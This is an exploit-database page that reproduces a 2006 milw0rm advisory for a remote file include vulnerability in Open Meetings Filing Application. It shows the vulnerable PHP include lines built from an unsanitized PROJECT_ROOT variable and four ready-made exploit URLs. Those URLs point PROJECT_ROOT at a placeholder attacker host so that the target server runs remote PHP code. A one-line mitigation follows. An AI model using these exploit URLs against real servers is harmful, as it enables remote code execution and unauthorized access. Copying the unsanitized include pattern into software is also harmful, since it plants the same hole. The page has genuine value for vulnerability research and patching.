header-logo
Suggest Exploit
vendor:
Open Meetings Filing Application
by:
xoron
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Open Meetings Filing Application
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Open Meetings Filing Application (PROJECT_ROOT) Remote File Include Vulnerability

Open Meetings Filing Application is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Open Meetings Filing Application (PROJECT_ROOT) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!

Ne mutlu türküm diyene

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include_once($PROJECT_ROOT."/inc/session.php");
include_once($PROJECT_ROOT."/inc/user.php");    
include_once($PROJECT_ROOT."/inc/entities.php");    
include_once($PROJECT_ROOT."/inc/openMeetingsDB.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/editmeetings/session.php?PROJECT_ROOT=http://evil_script?
http://www.hedef.com/[script_path]/email/session.php?PROJECT_ROOT=http://evil_script?
http://www.hedef.com/[script_path]/entityproperties/session.php?PROJECT_ROOT=http://evil_script?
http://www.hedef.com/[script_path]/inc/mail.php?PROJECT_ROOT=http://evil_script?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1k4t, x_w0x, DJR, Sh0ck mdx, ERNE:)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

script down:http://www.gocc.gov/groups/RI_SOS/software/files/OpenMtgsFiling.zip

# milw0rm.com [2006-10-21]